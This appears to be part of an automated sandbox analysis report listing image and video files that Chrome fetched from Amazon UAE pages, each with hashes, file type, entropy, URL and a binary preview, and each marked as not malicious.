                                                                                                                                                                                                                                                                      SHA1:04CF472C503E7BCDFA1CF50CF18A076F28954096
                                                                                                                                                                                                                                                                      SHA-256:7180457786DDD83024854E75C8EC30B3E4631DB27D0A64DC97EFED65ECF91F7E
                                                                                                                                                                                                                                                                      SHA-512:0F87B2D6609F23BC1623C16FDD033F3801CEC7AF08D681D22BCF53E79BAEFC6A2DD7A9276987CA0016C70F79A467AA1B6CDEC35711C69F292E2AFD4E4925031A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944616_186x116_1X_ar_AE._SY116_CB567106849_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..............................................................................#.......................................................................t...."..............................................................!1....A"2Qa..q..#3BRSb.....Tc....4..st....................................................!1.A...2Qaq.."....$DRb...............?..d&..../.O_..._r......p.Sz...5.....K#n\..Z..{._......</_]...?..j......t......5.i...Uq.hZ.k.$}...d..........a..i..e=...$......"......G......:..T.7T<..]f..'..]H.f.).5.........s$........-{..[r.?.X.{u_.....N.j?.`..O.K...Q..0K..gb=..Mr}.@.U7..0.....7..~s.%.|m.L..i_..f.%sm.P..1{S.a.J..........s.(..........X.uIH(.*.x......1..K@.$......P.t.,.C...i.,NxmA|.0.3..ZA.*.toK-D..4....j.p.ia..j.XE...y.e.`.Jv..A.....?....x...e.ss...FY...LhD.{3.Gj.#*+ZE...l..+.A_..\Y.......MmW7...5...x.+..<?....D..O?5W...,..y.\..mO.U.f..C[N.N...o.*6.....P..us^.O..S..1.CZ0.D......O........u..\..EGV...2'.Mx.I%._&.......c..9U..p.I#i...u..B*
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ISO Media, Apple iTunes Video (.M4V) Video
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1048576
                                                                                                                                                                                                                                                                      Entropy (8bit):7.98000854645573
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24576:JgvG2ZoZOnU34hG64Mx9bPVxaVABNOLKCeZ2v/jQYUp:JkocnLGsW7/z7QYk
                                                                                                                                                                                                                                                                      MD5:B3F2FFCFCC81E4E22E7354D1E8D00E66
                                                                                                                                                                                                                                                                      SHA1:E9C9C941A0A5487565F2865CECFD87ED0C28B229
                                                                                                                                                                                                                                                                      SHA-256:A9EF395FAD2C7407C92BD270A6AA3F23E406C6D63BA9E078CF5F0B806A3BC9FA
                                                                                                                                                                                                                                                                      SHA-512:4BC884F768AC8E7BD0960DA685C812E56B656B27C41156945A4A6E1AD085D6560C48ED85D0FF2382BB635BD1BC39B7D9714B3C7927C56235029D0A2484ED3B8F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/d357b1d2-39e5-4349-8019-c0e0644649ee.mp4/productVideoOptimized.mp4:2f7ecbfff31cc2:0
                                                                                                                                                                                                                                                                      Preview:....ftypM4V ....isomavc1mp42..&imoov...lmvhd......0...0.........................................................@..................................!iods.......O..).................Gtrak...\tkhd......0...0.............................................................@........h......mdia... mdhd......0...0...a.....U......<hdlr........vide............ETI ISO Video Media Handler.....minf....vmhd...............$dinf....dref............url .......?stbl....stsd............avc1...........................h.H...H.........Elemental H.264........................pasp...........AavcC.B.....*'B...B.@_..-@@@P.............................(. ....btrt...|...........stts...........w.......0stss...............&...D...................-... cslg...........................(stsc.......................w............stsz...........w...|...........................D...o...N...........A...................".......K...................................g...U...^..........................vG...A... ..."...8.......&........
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3718
                                                                                                                                                                                                                                                                      Entropy (8bit):7.688627378509351
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TGgtPDzAKOsZ1aYkI62zket4JpBOjuwFLPv0iE97ynBQr1FjWMwon:nbzn1aG62lSRwuwF4iENyniFion
                                                                                                                                                                                                                                                                      MD5:2432EBFE16068CE8B56632DB9174309B
                                                                                                                                                                                                                                                                      SHA1:593B1BD3574A7AA1CC2C6E8D56EEF25AAEF3DF52
                                                                                                                                                                                                                                                                      SHA-256:EFA0C13C821530BB771903C86D0454D49A38E0F0E1182733275983077F820AD1
                                                                                                                                                                                                                                                                      SHA-512:C584CD0BA66F9F74F8F551880808325F99A10E77688E6BA2DC5F88A907795EE298ADCD79DE459BFEEE151F1578272334977BA4F2312A15E51825AB69426BC6BE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/31EO3Wv+aeL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1..............................................................X....................................!z.-.I............Cy4W&.h.c}....y.5=..&-....3.YZ..........H.sCr...Q.[.E.gR..K........]eN.*.V..5..C...h...|;.D;.._....QcF...e|.....x.....]K....n.a....v.......&.6..... %."...mU..`Pm#..S..>!......G.].M.z.x.../..`.j..dC..V.....t..Y...~#[...cE......n.=j.........X.).....#..&.%..+@..[.*]b$.c..9Y...o)....7.1...,.b.2.).W.....S.. .c.........-.....^q..]i9............`d.q..u.A...[0..|=.)X..x...:l.`#..""<{H`.D.......k.C.t..#.!.<..p....H..G....................................?...+..........................3.!01.. "2#p.@A............s.EU......q..:..W8...\.us..S....:.N.S....:.N.S......It.U.J2.....M..e6.m...6...JIOo.3!)...EO.^(.5|R..FFFFFFFFFFDr...I.F..{(c.]Ug,lk.Yn....Q.j......@......h.&..._.........
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4406
                                                                                                                                                                                                                                                                      Entropy (8bit):7.708118239255408
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:R9OEXNkccDp0ks1wetNPNGCn+JLySBRbTbriM8hPMm/Laqjy:rQDvABtNFc3TbrUhPxWqW
                                                                                                                                                                                                                                                                      MD5:17CCA7168F2A2CD730390E9BE166250A
                                                                                                                                                                                                                                                                      SHA1:AA654D6E37A7D776DB85093F7EC4845B6DE1C7BB
                                                                                                                                                                                                                                                                      SHA-256:3C90972F1C2C388F93EAD7D80A517F9C87DF00692ABC29CCE7AF62880AEABE3A
                                                                                                                                                                                                                                                                      SHA-512:01C23E69EF968D67F20B25C90DF8F7C7317AC2A444E1863EA9ECA81238A8911FE1BD1041E2D8BF10854DD8AC9B29DBA054E69E592C334D29804A324DEE250BC4
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_20_BTS24_AE_GW_QC-CROSSA_DQC_CL_Nutrition_186x116_EN._SY116_CB566993070_.jpg
                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6C265638478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:6C265637478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="CE6620C76A0D1BC9846AF38E4B94797E" stRef:documentID="CE6620C76A0D1BC9846AF38E4B94797E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d.......................4................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x256, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16870
                                                                                                                                                                                                                                                                      Entropy (8bit):7.953767659144215
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:h61t9SrG44z3C7OwCKdJ2BGCXp6c3fXRJY6PfgYT5CoKrp28hgX:Iv9Igz31wCiJUB6cPXR68gYv62jX
                                                                                                                                                                                                                                                                      MD5:77339379882D1CD49A7E429E2ED40E62
                                                                                                                                                                                                                                                                      SHA1:9F7D5A5A391A807F5754F3E30BB1F519AC50D0F2
                                                                                                                                                                                                                                                                      SHA-256:BDA6D0724FEECC9D32DEC4DC2ADA54C2D5D2D387D994FECC5349E45CEB401BA5
                                                                                                                                                                                                                                                                      SHA-512:6132C51AB5E7B2D3F09BB0ACD82E392CA0FC90AE89FA835C2800A18CCA720A1FDC9092CAFEACEDD0604B1D9B4718694D29488DA2856E764E83A4F5BCE78CFD27
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61c-ZStR+kL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........4...........................................................................g.GA...3..]..^...pH.....3(;?o.N..(b.n...'E.C.z...............Q..>..,xGV.9.Ym.an...r'...](.n.....k.....RwU...<+0............{W#.D........].....G;..c.....&=. n.4R.C......M..g.9k.......7;2o7~..+.>P.....h.9....Zp...:.99@.`...rJ...'....9$.D..D%Z$,..B..o_..+.1..\..............d..g..=.<.J{......b.c.@%..Q{u/.*....KE:.6k..c.!-n.;.kf.8..uS6.3j:g.....#.....e.C.^~...N...2L...}livi....y...(..v...bF...9gG:..."...<....j..5.\.G...C..ea....=.1..]..U.ZY..9..F{#.n[....1.o.t."8t......,..1....m........=.7 W.Q..K...8.....z...S6.=.....?....0...t.T../.*U...ZIb.V.ME..=Y..m..ts].]o.3.E..=.y/.y..:....nw.....].W+......B..\.8.?36...q.ukA...u..I.{x.Z.B..V-....yc..q...o=3.......*..Ty.[.t..+..e.?QP=I,./.7.<2..xQ.M..es24.m..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):41762
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9791080430781385
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:17zffpIkPcc2iBJga0sn3JauYOK/hlABI0jQXCfGqX8Eppa:skIiByxs3IuK/hlABI1CB8H
                                                                                                                                                                                                                                                                      MD5:F70FAEF5144B6B30D95B8F6334F055CB
                                                                                                                                                                                                                                                                      SHA1:C727878DCA13ACFE69F8072824805EE9F694D38C
                                                                                                                                                                                                                                                                      SHA-256:08BDF73847AE3954565E02FFB7C03BFBCCD41AD9F62C042348F6D347CE0DE3B3
                                                                                                                                                                                                                                                                      SHA-512:E1F08E44D9CCDC1A16D0C65567228F57D1D1F5E5E73409BDD9C74AADC412511F6A7662B4B4D03A2E1BDFEC495275D46E2A1D68C0E55389DF59E5F9A8781C698F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."..................................................J.:.....<.9{r. n(B..]..A...CH..<O9.T.N.<#M...Sv.......#...7.FiQ.^..[~TW1......d..NT......[U.....d.2G..~......>..o#..L.........A....j.4..v...T.n.......Y1....@..5B..2.t.G.v.K.ar1O.w..i..........|^k..FZ*.f..9..p;../.^.....J7..mF:..)Hh.V+L....].B..A.z|...o?..(.sI.L.-.rK.....=......;--...Q9......K.UQAGwt..f..F.W.s...X#..../...........*PvwsA.Yl...r....2l2Xz.yu...GNgm.f.zk.........-.]W...p..Y..\f..l..Q.....jY...o...0^.~.[Ft..!.{...|...r.O......S.[j..~3..&......e.......Z.....F..&t.5^...\...m...m..'....-.~...H..G. E...N....u.F..Dl.....ilrU]Oc....){#f..O...38.U.q....E.NV...u^.Kl..h.....e.KV.b.5.jyl%Y..o.L'.cf.....Mz.G.Il..9.=...m..@...n...X*+oTo8MV.........>.f...9..v..p.y.-Mc.......J..=.l.........t.g!...m._o..4+h.9..l9^....$..4.Z.W.)c....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 214x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):12647
                                                                                                                                                                                                                                                                      Entropy (8bit):7.967362930387541
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:ePfFw7SszzJEoKLl2qev2kGkY7el9Tsx5KwsTvPEv3VrYlPeW9Rbue:md8PKBLI2Z9qtaKBvQYlP3Fue
                                                                                                                                                                                                                                                                      MD5:BEDC1CC440CF12E7571DAE8C4252B5A1
                                                                                                                                                                                                                                                                      SHA1:37474E6843B9D61766A36D8A15BFD26828C9DF5A
                                                                                                                                                                                                                                                                      SHA-256:C6F25761749444449A5DE23E98DE673E54B38D1DC2DB7DE317FAF17C5AD123CF
                                                                                                                                                                                                                                                                      SHA-512:22A5E4B1C1FFD177B9C13C0C04F99FBEE88B540D40C144D57288EFBC9AA198F94E401A759CB91C8C928EE391520745B346B38FD4C620B3A073F32E089452CB7D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!.1.2AQ.."Uaqst.........#456RTbru....3B...7.Sd..$Cce..................................................!1..R."2Ar34BQaq..................?...mz.\......R......b........a>.o}+[A.{..... 1..Gk.d..}Td..ut......hS].H..{^Y.\..Q.L>p.xj..j.R.......h...,xs.>....u.......c.E..kOG.K.......fy..f"L...,..a...v.b.\.V.......,p8.....L..y...[>....fi../.%.p...8.#*)...Z..ZY...P..j.....{.B.V.s....l..)Rh..1......8....+..........%+_..>...5.i.CrR7.U..#.M.8...{.t...,,on.Y....>xOM.P..:.....W.....$..>.._%....(H?m.i.....}J.qG....~.......F..X.d.J.....".lu...,....4....E.&..u.V.B..Ez#..xZ.^I<..!B...*.i..[....QG....]..).(.yq...............[M..q*.s.Yc...P.o...../.O.G..}v......`.......f.......r....+.......+...>.K.S.Q....]..).*.z.8..&.`..).7.H".>....h{.;L..W..,c
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):25478
                                                                                                                                                                                                                                                                      Entropy (8bit):7.92978121252003
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:Fv+yHfEgULycC0EpJv4JBOxS4DvPslvkB:hHdU+cgJEIQOkdkB
                                                                                                                                                                                                                                                                      MD5:F8CE2302A89E6E7BAA98A5F0E55CDEB8
                                                                                                                                                                                                                                                                      SHA1:FC0B420C83AE085D860BA2E81F452189E015D56F
                                                                                                                                                                                                                                                                      SHA-256:F4735FFDC08DC53378C2C07E60E28564C27D74D986323B3CE43A861535A445F1
                                                                                                                                                                                                                                                                      SHA-512:246665FC165A768FEA2F681EE515FC3892C53CCF018C30F607CC3C4FDCB45180D1217D803DBFE5D4C76E6D28006D760D66E455DCDBE5F25CC7BD59A2DE9650EF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."...........................................D..............................!.1."AQ..q.#2a..B...$%5.'Cs....3RS...................................<.........................!..1."AQa..q..#2B.......$%3R...Ss............?..C.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.....C......aS.Y}..8...l.....ec.fp\.*.#. .A...d........2..h.9+...Z..=.....J.......$.BYaL..(.r..Oa'..ps....k..x.dS..Z.D<..Q/.e.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D2621%26pc%3D12736%26at%3D12736%26t%3D1724264943922%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:12736
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 124x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):13172
                                                                                                                                                                                                                                                                      Entropy (8bit):7.963011611283635
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:LtiCOkPJ9yBxlLyYHaaU7KQ+veqnZ3/dNX38a1Tc3p2deGtr4eDWrDbOFYfY/MIV:FOPRLyMjnZ/C3pb5n7Ykvkb
                                                                                                                                                                                                                                                                      MD5:F0E3EE6776CE917FE899C8ECC68A1D17
                                                                                                                                                                                                                                                                      SHA1:4F1E798707DA1E79DD11E0181AE4AA4EA2913679
                                                                                                                                                                                                                                                                      SHA-256:7B427DB2E19690E80D179DFA7508EEDD640A6E94250C31010B0DCB7587198EBA
                                                                                                                                                                                                                                                                      SHA-512:53177ADD62F001A9E8955A3A97B69628416D2FF091982B234F4516BCBB99D9C982F6C7CB2CE70E7140DBA0C1F03E14FD1F8F2AF3C0FEBF8043D125FAC9F069D2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........|.."..............................................................!.."1..2Aq#Q.3aBR....$Tr....S.t.....................................................!1"AQa.q..2......#...Rb.C..............?.p..P.(.+...ZhjdR...8..*[.=..-r..........]f......Y55..s.i..%..S.?.R%o|U^...X...M.:T]8.."4..~..m.w...c6....s....%....R).'..VF...E..Dn.e'&.....J.."............:i{..Fz.Y....E+.q.G!e#.F_..kIq.=...wX........9.Ui....3...+z0J..\.:.{...;..c...mg.....C.Z.%......\6....!.&......Xr..<n.-......1.ui.-.7..]....;..sv.C..=.:.....?].Hqn.7....r...o..M..2[.*......J.%U. .......n...M....z..k..I...!.3..)..0&....7#P/.t..E&;..pj..E.B$.u....s.u..8..u...BX_...q.......G'p0..-'....5...h7Z.7:..F......y0....g.....<G....{...I..2.ZV.x.Tr....Pq...-........?..y.2I0y@.?........ca.'..]....P="H.d)..........".5..p..i.x..P.6=.b-.'.$.....}....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 160x37, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):644
                                                                                                                                                                                                                                                                      Entropy (8bit):7.666353118240485
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:12:EFNuOUxhudCevP12Vw2EXuHB+EvdP0fB5C+t1bhuuht3tLluYomRMFCeSl8WJ:RudCOAF5dd0vrdhRtL4qqFvBW
                                                                                                                                                                                                                                                                      MD5:036CA98903750DCBBE60C43B7B56BBF7
                                                                                                                                                                                                                                                                      SHA1:4BD8A1584481CF8FEB4A9E7017ED5402965E6E19
                                                                                                                                                                                                                                                                      SHA-256:19E877690620DD9C7D0EC5638260E9198389E7F96FF2F71F6C17CDD436D648E0
                                                                                                                                                                                                                                                                      SHA-512:86D204E8ABE33E3D149275439ABA62E152ED3584FC57A292A9E7467978689E7BEE837FFD87F053182AC2F67457B7FC62D482083DF00E3193CD1AD212CBD07ECA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:RIFF|...WEBPVP8 p........*..%.?...N.&.!1..A.1....m.\^?~..7.....m..B...NXl..X........ve...J....4.ijP....U8aw..eQ.f.$.-..<....d.R....<+'.[./J...oA....iH.t..P_..0...".o5K.r.D.Z.3..). ...!....sW...`..u.A.X.....d_.M...jj.....t.#.8..[.#6.d........O.g.F..v:'?...R...bW.2.bKi|7DUC.j...U.....q.nF.`....R9u.`>.Jl...>y...n.e..w.....:.{.\_...+.5.....n.h^.:..Q_.b.CW.?....2.N....p..(.-]H4.;...rj.^-.X.Y.\.]........P%@q.v.(.S.@.%..F|....t.`..L!.......N6.U.p.|.....w.....a7./w8X#\*..7.....,.M.Q.'.3X....L[...J..=.._.$....V.m.B4..=#..wD.uQ.>....... `y..T`.....~.2.RRl;....N.....@..`F...t2...L.Q..T...1X.A..a(w..^\{..t.9.F...,.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 640x640, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):33144
                                                                                                                                                                                                                                                                      Entropy (8bit):7.963314496470416
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:LtvI/IFVUvONeO2BdeuJy852YD/gTgrThj65/lO8qFx6/YjBQlPwn3YQkyUF+L8R:LNI/IFVUxB3/k0f50lLKmPwDvWeRHZ0
                                                                                                                                                                                                                                                                      MD5:C5B57D5A6992EE1CF0C4A200198F475D
                                                                                                                                                                                                                                                                      SHA1:80952D71248190AC33B12A6CBF602792B05BEA7C
                                                                                                                                                                                                                                                                      SHA-256:539BEFC20335C304EE27FFA8ADF96E6A7BBB3D7E2CFCFFF03E58E702F54F083A
                                                                                                                                                                                                                                                                      SHA-512:A7AC9BA246BE1BF155429B113E37B7D22084E5CCD1AC734C3FF7F31FB3DA815BED2B3A9A004E7DD1F77B6B8178F918F6E672581A12B0D3F36F3B5F3D3F8F1145
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.........................!.....+....'...'.''.#'##,'!!',#');)0+5,)8););::=BC;'BZ..........!8'.,:0.)E:C,:=::+L:C8:#;:,55,,0)0:,==;.+=8'Q+,':8B5'=H..........."..........4.......................................................................;-...H.id..6B*&.........................qu.......p...y....m.~L..jfS.f........y5..5...qE.]!d.8.QDe..j......................2.\;"..w..[q...........bF..%..../.1..4....H........K.........~@...................m..O........Y6.jZV.d8.A..E.{kV..+X..\...(cRJ..T.\W_.x.t.u..LrM2.[K".y..].c..................H.ZD.m..q[..:...t.2.i.......A.....0.j_**E....h..;...=[X2......:.G........Z..)Y...................X....Y:M..ywa..0..8.._..p.....F..xK.d....H1........]fn...Y.V..c..=O...%6.'...D............,...+B+f.#....[|Z....Y.2.&&Y.3.U...J[.........J_d.c.ylW...z.Y.h.2.....y4.~....W.|L.`...........fpU...I..E..{.....L@../...nM..6..4.Lp..I.)/..&.RL. ...m......E..4....W...G|$....q.......%..Z............D..s..[.:nJ..!..-\.nF.>..b(`.9.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D12165%26pc%3D12719%26at%3D12719%26t%3D1724264943905%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:12719
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):26626
                                                                                                                                                                                                                                                                      Entropy (8bit):7.969779131701919
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1l4+lHlWipSlf363abYZdHqe5lQeRX3r3iDMjwJe:X4ml4J36qQ/NbSDML
                                                                                                                                                                                                                                                                      MD5:ED2B9BA59B306A16CF38431EDEEF4D04
                                                                                                                                                                                                                                                                      SHA1:01CCBACA8D90FF27E99828401809DF3B3B266A33
                                                                                                                                                                                                                                                                      SHA-256:4B34B7AA79D0C6688D13E2CE4D339280DF7803B20452C66C9473F0B76E4877D4
